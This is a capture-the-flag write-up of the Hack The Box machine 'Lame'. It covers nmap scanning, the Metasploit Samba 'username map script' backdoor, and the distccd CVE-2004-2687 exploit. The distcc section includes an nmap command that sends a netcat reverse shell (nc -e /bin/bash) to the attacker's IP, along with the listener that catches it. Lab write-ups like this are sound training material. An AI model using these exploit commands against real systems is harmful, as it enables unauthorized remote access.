LAME

Lame is easy rated Linux machine. Target IP is 10.129.213.71 lets start.

Firstly lets look at the open ports as always.

nmap -sC -sV -O -oA nmap.txt 10.129.213.71

• Port 21: running ftp protocol and allowed anonymous login.

• Port 22: running ssh

• Ports 139 and 445: are running Samba v3.0.20-Debian.

Let’s do a more detailed scan to make sure there are no missing ports.

nmap -sC -sV -O -p- -oA nmap.txt 10.129.213.71

We have one more port 3632 and it is running distccd service. I note it, we will use later. Now lets try FTP anonymous login, but nothing significant comes up.

We are looking for a backdoor related to the ftp version, there is something

I set rhosts but no session was created, it asks password.

Let’s see if anything comes with port 22. There is command execution but I will try this later.

For now let’s move on to the other port 139 which run Samba v3.0.20-Debian. There is command execution backdoor in metasploit named ‘Username map script’, lets try.

We set rhosts as a target machine 10.129.213.71 and set lhost tun0, This brings us shell.

We search for the user and root flag by browsing the directories and got.

I want to try to get shell with another way, lets remember more detailed nmap result and we see that port 3632 is open.

Googling:

There is a nmap script related to distccd service as we see, lets try.

I tried with meterpreter but no session was created.

Let’s try with Nmap. I tried 5–6 times but it didn’t work, later I realized that I wrote my IP wrong, fixed it by confirming with ifconfig. We applied reverse shell in the nmap script and opened netcat then shell dropped.

nmap -p 3632 10.129.213.71 --script distcc-cve2004-2687 --script-args="distcc-cve2004-2687.cmd ='nc -nv 10.10.14.168 4466 -e /bin/bash'""

nc -nlvp 4466

We got another shell with different method, but this time it is low privileged, we already got root flag so that is enough.